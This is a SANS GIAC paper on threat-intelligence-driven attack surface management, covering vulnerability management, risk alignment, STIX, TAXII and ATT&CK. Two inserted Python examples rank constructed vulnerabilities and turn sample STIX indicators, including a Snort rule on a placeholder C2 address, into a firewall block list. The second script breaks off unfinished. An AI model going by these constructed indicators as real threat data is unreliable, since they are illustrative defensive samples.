Threat Intelligence-Driven Attack Surface Management

GIAC (GCTI) Gold Certification

Author: Jonathan Matkowsky, jmatkowsky@microsoft.com
Advisor: Hamed Khiabani, Ph.D.
Accepted: July 25, 2022

Abstract

Defenders struggle to keep up with the pace of digital transformation in the face of an expanding modern enterprise attack surface and more sophisticated adversaries. A conceptual framework for relating attack surface management (ASM) to vulnerability management and cyber threat intelligence (CTI) improves cyber defense. The framework explains how ASM improves cyber resiliency in proactively detecting and responding to weaknesses that adversaries could exploit to cause unacceptable harm. Defenders should prioritize ASM aligning with the business continuity and enterprise risk management functions. A CTI-driven ASM conceptual framework (CTI-ASM) helps defenders achieve decision clarity on how best to prioritize preventing the most impactful exploitations based on adversaries' capabilities, opportunities, and intent. Security researchers have applied decision analysis methodology to solve various security challenges generally. Applying decision analysis methodology to CTI-ASM may improve the quality of its implementation and support higher quality CTI. Potentially helpful decision analysis tools and concepts include relevance diagrams, possibility and probability trees, sensitivity analysis, corporate risk attitudes, weighing imperfect information, and accounting for cognitive biases.

© 2022 The SANS Institute. Author retains full rights.

1. Introduction

This commentary suggests that a cyber threat intelligence (CTI)-driven attack surface management (ASM) conceptual framework (CTI-ASM) may improve cyber resiliency against a continuously expanding modern enterprise attack surface (AS) and more sophisticated adversaries.
After discussing desirable features of CTI-ASM and possible technical tools, methods, and architectures to implement CTI-ASM, the commentary suggests that applying decision analysis methodology (DA) could improve both CTI-ASM and CTI. DA is a scientific method combining systems analysis and statistical decision theory for making rational decisions in complex, dynamic, and uncertain situations (Howard & Matheson, 1989). Security researchers have applied DA to physical security systems (Lin et al., 2009), document trustworthiness (Bong et al., 2012), hardware security, counterfeit electronics detection, cyber system upgrades and maintenance (Collier et al., 2014), and intrusion detection architectures (Zbakh et al., 2015). They have more recently applied DA with graph analytics for cyber system resiliency (Dwivedi, 2018), rank-weight methods for multi-criteria decision analysis (Gourisetti et al., 2020), dynamic information processing (Hong, 2020), and simulations to improve risk thinking (Shreve et al., 2021).

2. A glimpse of the enterprise attack surface

The AS is the enterprise's weakness in its security procedures and internal controls that adversaries want to exploit (NIST, 2011a, p. b1).

[Fig. 1. Woodall, T. (2022). Modern Day AS. JPEG file.]

Adversaries target any business units or functions within the enterprise to obtain unauthorized data access or disrupt services (NIST, 2012b). The targeted AS not only includes valuable data, intangible assets, and intellectual property more generally but also machine learning (ML) and artificial intelligence (AI), which, as adversarial failures in ML and AI increase, will become more pressing (cf. Microsoft, 2020). By viewing the AS from the adversaries' perspective [Fig. 1, supra], defenders may find the path of least resistance that adversaries will target.
The path of least resistance is any initial trajectory by which adversaries start causing harm through flaws discovered externally in enterprise assets. Other external forms of vulnerability require more than passive scanning: interactive probing or exchanging communications to spot weaknesses, such as social engineering used in penetration testing. Assets partly define the AS within the established points that an adversary can influence, access, or change to the possible detriment of the enterprise's mission, aims, and priorities (cf. Barrett, 2018, p. 14). The AS is dynamic, though. It includes anybody, any place, and anything that is either supporting operations or furthering the strategic direction that the system is interacting with or connected to; this includes embedded processors and controllers, telecommunication networks, and parts of the Internet (Stine et al., 2021, p. 18; Joint Task Force, 2018, p. 16; NIST, 2011a, pp. 1, b3; NIST, n.d.). Much like people and the software they write, which are prone to errors and targeted to get a stronger foothold into an organization, supply chain systems are also part of the AS. Protecting high-confidence bodies of training data, for instance, is a supply chain issue: engineers reuse models trained by others because training algorithms are resource-intensive (Microsoft, 2022h; Shankar et al., 2020). MITRE ATLAS case studies illustrate how adversarial ML techniques can cause considerable damage to production ML (MITRE, n.d.). Supply chain systems may integrate several technologies running on cyber-physical infrastructures and digital system components (Yeboah-Ofori et al., 2021). It is not just high-level systems. Post SolarWinds (CVE-2021-35244, 2021), defenders should secure the supply chain using software vulnerability assessment tools like MITRE's Software Assurance Platform (MITRE, 2022).
Also, code vulnerabilities, such as from open-source software repositories relied on by developers, are part of the AS (Microsoft, 2021e, p. 74; Wilburn & Schmidt, 2022). Finding the confines of a system affected by vulnerabilities is challenging because it requires understanding what it means for one system to be part of another (Spring, 2022).

3. Challenges of protecting the attack surface

Defenders struggle to keep up with the pace of harmful cyber activity converging with the speed of digital transformation. Cyber risk is already perceived ubiquitously as a top enterprise risk (Kumar, 2022). Moreover, the number of incidents is only rising in tandem with a broadening range and increasing severity of harm (Silver, 2021). Some say that before the Covid-19 outbreak, a business suffering a security breach could permanently lose anywhere from twenty to forty percent of its customer base (PCI Pal, 2019). As a result of the Covid-19 outbreak, organizations are even more vulnerable to cyber threats (McAfee & FireEye, 2021). They rushed to move their operations online (HBR, 2021, p. 2). "With legions of employees working from home and business processes quickly digitized, corporate information technology systems and data stores suddenly grew in size and complexity, offering an expanded and enticing [AS]." (HBR, 2021, p. 2). Global digital transformation is accelerating faster than during the height of the pandemic and will likely continue for at least the next several years (IDC, 2022b). The continued extension of enterprise boundaries and increased asset movements expands the AS. For instance, the dramatic rise in remote access services and virtual private network (VPN) usage during the Covid-19 pandemic made specific organizations more vulnerable (cf. Ginty, 2022).
According to the advisories cited in ZDNet, the increased vulnerabilities stemmed from organizations that patched or updated VPNs relatively infrequently, neglected multi-factor authentication, or resorted to trying to protect insecure services behind non-standard ports that adversaries could scan (cf. Ginty, 2022). In addition, corporate data infrastructure and applications now run across multiple clouds and hybrid environments (Badhwar, 2021, p. vii). As a result, even state-of-the-art firewalls and detection systems cannot alone safeguard corporate systems or infrastructure behind a moat; the enterprise would remain connected to the Internet (cf. Doerr, 2021). Furthermore, traditional perimeter defenses do not prevent adversaries from moving across the enterprise or steadily increasing access and control (Doherty & McKenney, 2021, p. 1). The Internet has progressively and effectively become the new perimeter (Sargent, 2022; Rose et al., 2020, p. 1). In addition, supply chain attacks prey on the fabric of mutual trust and dependencies supporting the economy, such as the NOBELIUM SolarWinds and HAFNIUM on-premises Exchange Server attacks (Microsoft, 2021e, pp. 1, 48, 58). Also, rapid and widespread adoption of the Internet of Things and operational technology—from smart speakers to voice-over-Internet-protocol-connected printers (cf. Hallum, 2021)—contributes to a much larger and more complicated AS. In addition, programmable systems and devices now regularly directly or indirectly interact with physical environments, including industrial controls, building management and physical access control, and environment measurement systems (NIST, n.d.).
Adversaries may now control cyber-physical systems—oil and gas pipelines, electrical power, autonomous vehicles, drones, traffic flow, transit systems, and even biological implants (cf. Microsoft, 2021c, pp. 71, 79, 82). For instance, critical security vulnerabilities in certain Chinese-made MiCODUS MV720 GPS trackers, currently used in over a hundred and fifty countries by businesses across a wide range of industries as well as by military, law enforcement, and government agencies and even a nuclear power plant operator, can easily be exploited remotely to fully control GPS, disarm vehicle alarms, change their routes, and cut off their fuel (Ahmed, 2022). "The amount of potential attack surfaces, attack vectors, and avenues for cyber-physical attacks is practically infinite." (Hamilton, 2021). This control is partly why ransomware payments in the United States have soared—hundreds of millions yearly (WSJ, 2022). There is potential for mass breaches of sensitive information and exploitations of critical memory allocation vulnerabilities that can crash systems across many industries and verticals. For example, Cobalt Strike, commonly used in the public and private sector as a penetration testing platform to test a firm's resiliency, has been so widely deployed by adversaries that RiskIQ detects a command-and-control (C2) server more than hourly (Ginty, 2022). Vulnerable end-of-life, unpatched, expired services and open ports are continuously in plain sight (Ginty, 2022). Because there is no longer a single, easily identified perimeter for the enterprise, maintaining visibility requires an intentional extension of focus to monitor the proliferation of mobile devices, Bring Your Own Device, Internet of Things, and cloud computing (Stine et al., 2020, p. 17).
In addition, because most organizations embrace a multi-cloud strategy, there is a growing AS of multi-cloud deployments of container technologies—virtual machines running "containers" of microservices and their packaged dependencies and configurations (e.g., Kubernetes and Docker) (CTID, 2021d). Unsurprisingly, organizations proactively managing their AS typically find approximately thirty percent more assets than they knew they owned (Microsoft, 2022g). And the metaverse may be the surge on the horizon. The next generation of the Internet beyond mobile and Web, in an autonomous virtual shared space, amplifies the existing AS. Devices that can be used as entry points threaten safety in the physical world through massive data streams and sensors collecting brain wave patterns, facial expressions, eye movements, hand movements, speech, and biometric features (Wang et al., 2022). The metaverse blurs digital and physical boundaries. As a result, protecting against Deepfake events will be more challenging, along with new challenges of compliance, privacy, identity, and trust management (Wang et al., 2022).

3.1. Sophisticated adversaries

Not only has the AS expanded and continues to expand, but we now also face sophisticated adversaries. They are not only compromising assets supporting business operations (Joint Task Force, 2018, p. 119) but explicitly targeting critical infrastructure, like crippling or holding hospitals hostage (WSJ, 2022). Also, these days, state actors want to infiltrate vital institutions in the public sector and private sector businesses that everyday households and local communities depend on for their personal and financial wellbeing.
(cf. The White House, 2021). Even non-state actors regularly deploy advanced anti-forensics and can more precisely target our weakest points (Dehghantanha et al., 2019, pp. 3, 165). They steal business model algorithms and inject payloads through mobile apps that poison deep learning models, impairing child safety (Yale & Zonghao, 2021). They also target ML models widely used for cyber defense (Beek, 2020). RiskIQ blocklists a newly detected malicious mobile app every five minutes (Microsoft, 2022f) and more than half a million new pieces of malware daily (Ginty, 2022). Threat actors change their playbooks often, use sophisticated anonymization, and commoditize sophisticated attack kits (Microsoft, 2021, pp. 1, 8-9, 20). Some of these attacks begin and end within as little as an hour or two (Microsoft, 2021c, p. 23). Last year alone, Microsoft observed more than ten billion malware threats, more than thirty-five billion phishing and other malicious emails, and over nine hundred brute force password theft attempts every second (Jakkal, 2022). Cybercrime will cost over ten trillion U.S. dollars annually by 2025 (Jakkal, 2022). Imagine if these costs could be avoided. It would be enough money for the U.S. government to distribute an annual stimulus check for nearly thirty thousand dollars to every person in the United States (cf. CIA, n.d.). The Russian Federation's attack on Ukraine and the resulting war further wrenched cyber preparedness throughout Europe and the United States. European Chief Information Security Officers (CISOs) are reassessing well-developed supply chain security guidelines and are concerned they need stronger cyber resilience due to the war. Likewise, almost half of U.S. CISOs expect to increase network protection because of the war (IDC, 2022a).

4. Attack surface management

With continuously expanding attack surfaces and more sophisticated adversaries, the "zero trust" paradigm now defines security aims (Rose et al., 2020, p. 4).
This paradigm requires continually analyzing and evaluating risks to corporate identities, devices, applications, data, networks, infrastructure, and business functions under the assumption that the adversary is present in the environment (Rose et al., 2020, p. 1; Microsoft, 2021e, p. 48). After all, incomplete knowledge of deployed systems and their patch state makes organizations more vulnerable to sudden large-scale attacks (Microsoft, 2021e, p. 48). Because of the continuously expanding AS and more sophisticated adversaries, insurance providers may expect continuous assessments and dynamic analyses to decide premiums and proper coverage (cf. Badhwar, 2021, p. 328). Also, given the challenge of protecting an enterprise from harmful cyber activity, public companies must consider the impacts of foreseeable cyber breaches, anecdotally exemplified by Bridgestone and Toyota choosing to proactively shut down parts of operations until they could better understand how cyber risk was affecting their operations (Harvard, 2022). Gone are the days when protecting the perimeter through antivirus, firewalls, and log management sufficed. Nonetheless, many defenders struggle to integrate a myriad of solutions to adjust to this complex environment because "[t]here is often a divide between business/mission owners and security/technology management." (Souppaya & Karen, 2022). ASM enables an organization to achieve and maintain an acceptable level of loss exposure cost-effectively (Freund & Jones, 2014, chap. 14) by combining practices and measures to achieve organizational aims as a management system (cf. Kazmi & Naarananoja, 2014, p. 97). ASM helps protect against decentralized and independent solutions whose architectures and records are not optimally compatible with performance measurement.
Performance measurement is an essential element of ASM, reporting progress and finding gaps (cf. Kazmi & Naarananoja, 2014, p. 98).

4.1. Vulnerability scanning and patch management

Enterprise vulnerability scanning and patch management (VuM) lays the foundation of ASM and supports defenders striving to proactively spot mismanaged resources before adversaries can use them for harmful cyber activity. Misconfigurations are often a root cause of compromised systems (Diogenes & Shinder, 2018, Ch. 1). "Indeed, Gartner predicts that by 2025, more than 85% of successful attacks against enterprise users will exploit configuration and user errors in legacy systems." (Gartner, 2021a, p. 4).

4.2. Business continuity and enterprise risk management

Defenders may gather insights from the business continuity management (BCM) function on how and what to prioritize protecting, especially for evaluating and considering the probable frequency and size of acceptable future losses (Freund & Jones, 2014; ISO, 2020, p. 2). For example, BCM may help to define the types of and the extent to which disruption is tolerable across a range of possible negative consequences for the organization: reputational damage, operational harm, contractual damages, monetary loss, legal repercussions, regulatory fines, and failure to deliver on business goals or lost business opportunities (ISO, 2020, pp. 4, 22). In addition, ASM may gain insights from the enterprise risk management (ERM) function within the organization (Joint Task Force, 2018, p. iv; Stine et al., 2020, p. 4). Evaluating the criticality and sensitivity of enterprise assets shapes the proper risk tolerance (Stine et al., 2021, p. 18).
Coordinating with ERM would help ensure risk alignment of resources with the organizational mission and vision and may help ERM protect shareholder value (COSO, 2017, pp. 2, 5). Coordinating with ERM is also important because cyber risks interlock with various other types of enterprise risks (cf. NIST, 2016c). "[Such] incidents can have operational, financial, reputational, and strategic consequences for the organization and these incidents are growing in number and cost." (Gartner, 2021b, p. 1). To fortify business goals and aims, ASM relies on senior leadership to define mission priorities, proper capital and operating expenses, and adequate risk appetite and tolerance (Stine et al., 2021, pp. 11, 15). In addition, turning to senior leadership is the only way to decide how to protect business assets based on their value to the business and the expected risk (Open Group, 2021).

4.3. Continuous visibility

Whether continuous visibility comes from a mature VuM program as part of ASM or from ASM software and managed services, ASM requires constant visibility into all the enterprise endpoints and assets. ASM focuses on managing adversaries' uncertain potential negative impact, understanding how adversaries exploit vulnerabilities, and neutralizing the exploitations by reducing the AS (Smith, 2022). Assets include embedded devices and servers, cloud services, source code, pre-deployed code, software platforms, virtual machines, applications and their dependencies and sources, components, operating systems, firmware, and which software and versions those assets run, down to the level of packages and libraries (Souppaya & Karen, 2022; Diamond et al., 2022).
For instance, ASM should supply continuous visibility of cloud assets across a multi-cloud environment to spot any misconfigurations or vulnerable components and understand how a potential adversary may try to exploit them (Estrin, 2022). After all, adversaries weaponize cloud resources to harm other target systems because of poor security hygiene, such as sharing public key secrets in a public cloud. For instance, bots will scan for keys leaked into log files on Continuous Integration and Continuous Delivery (CI/CD) services used for automation in building, testing, and deploying applications, and in Git repositories, such as GitHub, to steal these keys (Diogenes & Shinder, 2018, Ch. 1). ASM includes the "activities, technology and managed services deployed to discover internet-facing enterprise assets and systems and associated vulnerabilities" that adversaries would want to exploit (Shoard & Handa, 2021, p. 10)—even before any intrusion, during the reconnaissance stage (Hutchins et al., 2011). Otherwise, adversaries may be trying to maintain persistence or act on their objectives by the time they are detected. ASM organizes information enabling decisions on how to address the threats of adversaries' uncertain potential adverse impact and improve continuously (Barrett, 2018, p. 6). For example, defenders may prefer integrating relevant detection queries based on ASM priorities into an extended detection and response (XDR) solution with security orchestration, automation, and response (SOAR) capabilities (Microsoft, 2020). This integration would use automation and ML or hunter-trained AI to collect, correlate, and analyze relevant data across the enterprise environment—including endpoints, email traffic, applications, virtual machines, and identities.
After all, to meet the increased demands for digital interfaces and services and support a hybrid work environment, ASM must use expert-assisted AI, ML, and automation to effectively manage security risks at scale (HBR, 2021, pp. 4, 8). For instance, ASM may automatically surface and apply mitigation to vulnerable devices, software, files, and container images running in the cloud that use an affected Log4j component (Microsoft, 2021f). Defenders should also be able to discover attack surfaces in website paths and covert vulnerabilities in payloads with ASM (cf. Yan et al., 2022). In addition, ASM software should be able to consolidate AS vectors from multiple scanners to detect cross-site scripting vulnerabilities and other security issues in Java web applications and PHP web application vulnerabilities (Yan et al., 2022). With ASM, defenders identify a broad range of technical vulnerabilities used to gain initial access and non-technical vulnerabilities, such as exposed personal or access information in open-source data (Roy et al., 2022). ASM then helps contextualize how specific vulnerabilities from across the host, application, and network layers, when sequentially combined, become more effective for the adversary (Roy et al., 2022; Spring et al., 2021). ASM should illuminate what the adversary would target during the reconnaissance stage (Hutchins et al., 2011) when trying to infiltrate the organization (Shoard & Handa, 2021, p. 4). This ASM feature is sometimes called "External ASM" (Microsoft, 2021e). External ASM can detect vulnerabilities that the adversary would want to use to gain an initial foothold and drop remote access toolkits, activate hands-on-keyboard attacks, exfiltrate data, and deploy ransomware through libraries on devices, software files, and components (cf. Microsoft, 202d).

5. Threat intelligence-driven attack surface management

ASM alone does not measure whether adversaries commonly exploit an exposure or whether a vulnerability is well-known. In addition, it does not explain the degree of control or the benefit that the adversary would stand to gain, how easy it would be to get started, the specific impacts on human safety, if applicable, or the company's mission (Spring, 2022). Even after fine-tuning ASM based on BCM and ERM inputs, it appears from computational modeling applicable to modern systems that programmers cannot produce "a pragmatically useful piece of software....without vulnerabilities," which are "countably infinite." (Spring, 2022, pp. 11-12). Therefore, the technical details of specific vulnerabilities are not as helpful without understanding which vulnerabilities are likely to be used at any exact time and in a particular organization (Spring, 2022, p. 17). CTI-ASM helps contextualize how to prevent vulnerabilities from being exploited beyond the technical severity offered through the Common Vulnerability Scoring System (CVSS). Also, teams cannot focus on all threats, or they will get burned out (Godyla & Nickels, 2021). With CTI-ASM, defenders can use CTI assessments to prioritize vulnerabilities based on understanding the adversaries' capabilities, opportunities, and intent in conducting their harmful cyber activity (cf. Brown & Lee, 2021). CTI aids defenders in understanding the chronology of harmful cyber operations in the context of monitoring across endpoints, identities, and applications—both in the public and private cloud and hybrid (cf. Microsoft, 2021b). This way, defenders can not only detect and block malicious components of a single operation but also of a campaign and follow-on campaigns (cf. Microsoft, 2021).
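The capabilities, opportunities and intent prioritization described above, as an added example that is not the paper's own code: it ranks constructed ASM findings by CVSS alone and then with CTI context, so the reordering that CTI-ASM produces is visible. The weights, the placeholder CVE identifiers, the asset names and the actor names are all assumptions.

```python
"""CTI-driven vulnerability prioritization (added illustration).

Ranks constructed ASM findings by combining CVSS technical severity with the
CTI context the paper names: capability (exploitation is observed in the wild),
opportunity (the asset is reachable during reconnaissance) and intent (tracked
actors targeting our sector use the vulnerability), plus the BCM/ERM view of
asset criticality. Weights, CVE placeholders and actor names are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    asset: str
    cve: str                 # placeholder identifiers, not real CVE numbers
    cvss: float              # CVSS base score, 0-10: technical severity only
    internet_facing: bool    # opportunity: discoverable from outside the perimeter
    business_critical: bool  # BCM/ERM input: supports a function with low loss tolerance


@dataclass(frozen=True)
class CtiContext:
    exploited_in_wild: frozenset  # CVEs with observed exploitation (capability)
    actor_usage: dict             # cve -> frozenset of actor names known to use it
    sector_actors: frozenset      # actors whose intent includes our sector


# Multipliers are assumptions, chosen so CTI context can outweigh raw CVSS.
W_EXPLOITED, W_INTENT, W_EXPOSED, W_CRITICAL = 2.0, 1.5, 1.5, 1.5


def priority(f: Finding, cti: CtiContext):
    """Return (score, reasons). The score is CVSS scaled by every CTI factor that
    applies; the reasons list doubles as the audit trail of the judgment."""
    score, reasons = f.cvss, []
    if f.cve in cti.exploited_in_wild:
        score *= W_EXPLOITED
        reasons.append("capability: exploitation observed in the wild")
    actors = cti.actor_usage.get(f.cve, frozenset()) & cti.sector_actors
    if actors:
        score *= W_INTENT
        reasons.append("intent: used by " + ", ".join(sorted(actors)))
    if f.internet_facing:
        score *= W_EXPOSED
        reasons.append("opportunity: internet-facing asset")
    if f.business_critical:
        score *= W_CRITICAL
        reasons.append("impact: business-critical per BCM/ERM")
    return round(score, 3), reasons


def rank(findings, cti):
    """Findings ordered from most to least urgent under CTI-ASM."""
    return sorted(findings, key=lambda f: priority(f, cti)[0], reverse=True)


def rank_cvss_only(findings):
    """Baseline ordering a scanner alone would give (technical severity only)."""
    return sorted(findings, key=lambda f: f.cvss, reverse=True)


# Constructed sample data: four findings, three of them exploited in the wild.
FINDINGS = [
    Finding("web-gateway", "CVE-EXAMPLE-0001", 10.0, True, True),
    Finding("internal-db", "CVE-EXAMPLE-0002", 9.8, False, False),
    Finding("vpn-concentrator", "CVE-EXAMPLE-0003", 6.5, True, True),
    Finding("analyst-laptop", "CVE-EXAMPLE-0004", 7.5, False, False),
]
CTI = CtiContext(
    exploited_in_wild=frozenset({"CVE-EXAMPLE-0001", "CVE-EXAMPLE-0003", "CVE-EXAMPLE-0004"}),
    actor_usage={"CVE-EXAMPLE-0001": frozenset({"ACTOR-A"}),
                 "CVE-EXAMPLE-0003": frozenset({"ACTOR-B", "ACTOR-C"})},
    sector_actors=frozenset({"ACTOR-A", "ACTOR-B"}),
)

if __name__ == "__main__":
    print("CVSS only:", [f.asset for f in rank_cvss_only(FINDINGS)])
    print("CTI-ASM  :", [f.asset for f in rank(FINDINGS, CTI)])
    for f in rank(FINDINGS, CTI):
        score, why = priority(f, CTI)
        print(f"{f.asset:18} {f.cve} score={score:7.3f}  " + "; ".join(why))
```

The medium-severity VPN finding moves from last to second once exploitation, sector-specific intent and exposure are weighed, while the critical but unexploited internal database drops to last.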
CTI-ASM also reflects a conscientious effort to reduce methodical and perceptive biases in making judgments and analyzing evidence (cf. Heuer, 2019, pp. 111-72). Accordingly, it includes an "audit trail" of interpretations (Heuer, 2019, p. 109), presents assumptions and sequences of extrapolations, shows the level and basis of hesitation, and reveals and explains other viewpoints (Heuer, 2019, p. 16). Similarly, Charles T. Munger, Warren Buffett's partner in running Berkshire Hathaway, noted that Darwin's impact on science was due in considerable measure to prioritizing any evidence tending to undermine whatever cherished and hard-won theory he already had (Davis, 2009). According to Mr. Munger, Einstein also partially attributed his successful views to self-criticism, which Mr. Munger explained means testing and destroying his well-loved ideas (Davis, 2009). CTI-ASM (including embedded AI and ML) should similarly be self-critical, continuously striving to find evidence to confirm the weaknesses in any of its insights or convictions. Process-wise, CTI production starts with collecting and evaluating cyber threat information in its source and reliability through rigorous and structured tradecraft techniques using all-source knowledge and substantive experience (Security Intel, n.d.). It is an "intelligence-driven" method to rapidly detect, respond to, and recover from threat events, aimed at safeguarding assets (Stine et al., 2021, p. 26). CTI-ASM collects information on threats and threat actors from various technical and human means (Kriaa & Chaabane, 2021, p. 113) and expresses this comprehension in a structured way using proper analysis techniques (Schaberreiter et al., 2019). CTI-ASM is cyclical. Data collection is planned, implemented, and evaluated using systematized analytic skills.
It distributes and reevaluates the resulting intelligence based on feedback from a wide range of data collection sources, such as Kusto Query Language (KQL) queries (Microsoft, 2022c) for unusual processes that may have launched on a protected endpoint, and more current knowledge. Finally, CTI-ASM restructures the collection and fills intelligence gaps (cf. Security Intel, n.d.). Human experts assist AI and ML in CTI-ASM to promptly inform decision-makers, based on the evidence, about proactive and reactive cyber defensive measures (cf. CIS, 2021a). CTI-ASM derives actionable insights into how adversaries plan, conduct, and sustain their operations. It engages in direct attribution or profiling the type of threat actor using a robust and reliable set of considerations. CTI-ASM decides the malicious activity's scope, origin, and direction, assesses a timestamp, and evaluates the adversarial goals, aims, and TTPs (tactics, techniques, and procedures) (Mavroeidis et al., 2021, p. 328). CTI-ASM streamlines the collection and processing through automation that frees up analyst time needed to use CTI for awareness of the AS (cf. Brown & Lee, 2019, p. 15). For instance, last year, local governments found they could cut down the time needed to take defensive measures from days to a few minutes by taking part in a pilot project testing an automated data feed of potential network compromises (CIS, 2021a). This speed tends to be critical when dealing with hybrid attacks across multiple domains. For instance, blocking an adversary in the cloud from running malicious code on an endpoint will not stop the attacker from doing it again if they have already gained persistence in the cloud.
However, automation tools, fusing actionable intelligence across domain boundaries, remediating all affected assets, and improving the security configurations prevent a recurrence (Microsoft, 2022d). Applying ML techniques and algorithms to CTI properties can improve the accuracy of threat prediction analysis and hypothesis generation (Elitzur et al., 2019, p. 47). Such an application also helps find foreseeable vulnerabilities in the supply chain (e.g., ransomware and spear-phishing) and helps to apply reasonable controls (Yeboah-Ofori et al., 2021). In addition, ML and data mining have successfully analyzed malware and detected anomalous networks, including analyzing Border Gateway Protocol behavior (Dehghantanha et al., 2019, pp. 3, 67). Similarly, Microsoft uses statistical methods to track threat actors and TTPs (Microsoft, 2021a). Therefore, CTI-ASM includes the application of AI and ML to recognize, absorb, and act wisely against more advanced forms of harmful cyber activity (Dehghantanha et al., 2019, p. 3). ML derives risk scenarios from potential threats and vulnerabilities in crucial assets contributing to the AS. CTI-ASM will assess the derived risk scenarios on their impacts and frequency of effects (Stine et al., 2021, pp. 32-33). CTI sources include commercial subscriptions, automated data feeds, sector-specific sharing of indicators of compromise and alerts, industry-specific threat models, and knowledge bases of observed adversary tactics and techniques (Stine et al., 2021, p. 26). CTI formats in CTI-ASM include frameworks, standards, scoring, and enumerations. For example, MITRE ATT&CK (MITRE, n.d.) supplies an overview of specific threat characteristics. The STIX 2.1 (Structured Threat Information Expression) Course of Action (CoA) object is a standard for describing threats, attacks, and the facets of security incidents. CVSS supplies metrics for assessing the implications of artifacts.
Common Weakness Enumeration (CWE) supplies unique identifiers for classes of software and hardware weaknesses (Schlette et al., 2021, pp. 2527-28). Using the open-source tool ATT&CK Workbench, an organization may manage and extend its local version of ATT&CK and keep it synchronized with MITRE's knowledge base, so that CTI-ASM stays aligned with it (cf. CTID, 2021b).

CTI-ASM may ingest real-time CTI indicator feeds by using the Trusted Automated eXchange of Intelligence Information (TAXII) application protocol to transmit STIX data from a TAXII server (cf. CIS, 2021d). It also uses attacker behavior modeling to understand attack schemes and improve detection and analytic competencies (cf. Elitzur et al., 2019, p. 41). Using threat modeling, CTI-ASM helps focus on what an adversary wants to target (cf. Godyla & Nickels, 2021), such as by generating probabilistic attack graphs from CTI data (Gylling et al., 2021). Microsoft reports that probabilistic modeling of attacker behavior has stopped ransomware actors just two minutes into an attack (Microsoft, 2021a).

A CTI-ASM architecture consisting of an XDR solution with SOAR capabilities, built on a zero trust architecture, supplies cyber-situational awareness of events (Doherty & McKenney, 2021, p. 3) to reduce the AS. This architecture continuously watches assets for insights and anomalous patterns (cf. Open Group, 2021). In addition, it grows telemetry to increase visibility of the evolving relevant holdings of all types (cf. Open Group, 2021). Furthermore, it prioritizes based on risk analyses informed by current information on active threat actors and technical attack techniques (cf. Open Group, 2021). By understanding attack flows rather than focusing on one specific action at a time, CTI-ASM helps compose realistic adversary simulation scenarios (cf. CTID, 2022).
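As an added example (not from the paper or from any project it cites), the following Python, standard library only, shows what ingesting STIX 2.1 over TAXII looks like once the bundle has arrived: it pulls the IPv4 equality terms out of each indicator's pattern, attaches the Course of Action objects related to the indicator by a "mitigates" relationship, and emits a firewall block list. The bundle, its UUIDs and the addresses are constructed; 203.0.113.0/24 and 198.51.100.0/24 are RFC 5737 documentation ranges standing in for attacker infrastructure. The refusal to block private or the organization's own address space is the check a practitioner wants before wiring a shared feed into a perimeter device: one bad or poisoned indicator must not let the feed take down internal services, and revoked indicators must drop out of the list rather than linger.

```python
"""Turn STIX 2.1 indicators (as fetched over TAXII) into a firewall block list.
Constructed example: stdlib only, no TAXII client needed."""
import ipaddress
import json
import re
from typing import Iterable

# Equality terms only; MATCHES, ISSUBSET and other comparison operators are deliberately ignored.
IPV4_TERM = re.compile(r"ipv4-addr:value\s*=\s*'([0-9.]+)'")

# Never push these to a perimeter device whatever a shared feed says.  The RFC 5737 documentation
# ranges are left out on purpose because this example uses them as "attacker" space.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "255.255.255.255/32")]

# Constructed bundle: one clean indicator with a course of action, one mixing a public and a
# private address, one domain-only, one revoked, one inside "our" range, one non-STIX pattern.
SAMPLE_BUNDLE = json.dumps({"type": "bundle", "id": "bundle--5d0092c5-5f74-4287-9642-33f4c354e56d",
  "objects": [
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f",
     "name": "C2 address shared by a peer office", "indicator_types": ["malicious-activity"],
     "pattern_type": "stix", "valid_from": "2022-06-01T00:00:00Z",
     "pattern": "[ipv4-addr:value = '203.0.113.45']"},
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--1f4a2b4e-6c1d-4a3b-9d7e-0c1b2a3d4e5f",
     "pattern_type": "stix", "valid_from": "2022-06-01T00:00:00Z",
     "pattern": "[ipv4-addr:value = '198.51.100.7' OR ipv4-addr:value = '10.0.0.5']"},
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--2b5c3d6f-7e2f-4b4c-8e9f-1d2c3b4a5f60",
     "pattern_type": "stix", "valid_from": "2022-06-01T00:00:00Z",
     "pattern": "[domain-name:value = 'update.example.net']"},
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--3c6d4e70-8f30-4c5d-9fa0-2e3d4c5b6071",
     "pattern_type": "stix", "valid_from": "2022-06-01T00:00:00Z", "revoked": True,
     "pattern": "[ipv4-addr:value = '203.0.113.99']"},
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--4d7e5f81-9041-4d6e-a0b1-3f4e5d6c7182",
     "pattern_type": "stix", "valid_from": "2022-06-01T00:00:00Z",
     "pattern": "[ipv4-addr:value = '198.51.100.250']"},
    {"type": "indicator", "spec_version": "2.1", "id": "indicator--5e8f6092-a152-4e7f-b1c2-405f6e7d8293",
     "pattern_type": "snort", "valid_from": "2022-06-01T00:00:00Z",
     "pattern": "alert tcp any any -> 203.0.113.45 443 (msg:\"C2\"; sid:1000001;)"},
    {"type": "course-of-action", "spec_version": "2.1", "id": "course-of-action--6f90a1b3-b263-4f80-82d3-5160708e93a4",
     "name": "Block the address at the perimeter firewall"},
    {"type": "relationship", "spec_version": "2.1", "id": "relationship--70a1b2c4-c374-4091-93e4-6271809fa4b5",
     "relationship_type": "mitigates",
     "source_ref": "course-of-action--6f90a1b3-b263-4f80-82d3-5160708e93a4",
     "target_ref": "indicator--8e2e2d2b-17d4-4cbf-938f-98ee46b3cd3f"}]})


def ipv4_terms(pattern: str) -> list[str]:
    """Literal IPv4 values compared with '=' in a STIX pattern."""
    return IPV4_TERM.findall(pattern)


def mitigations(bundle: dict) -> dict[str, list[str]]:
    """indicator id -> names of course-of-action objects linked to it by a 'mitigates' relationship."""
    coa = {o["id"]: o.get("name", o["id"]) for o in bundle["objects"] if o["type"] == "course-of-action"}
    out: dict[str, list[str]] = {}
    for rel in bundle["objects"]:
        if rel["type"] == "relationship" and rel.get("relationship_type") == "mitigates" and rel["source_ref"] in coa:
            out.setdefault(rel["target_ref"], []).append(coa[rel["source_ref"]])
    return out


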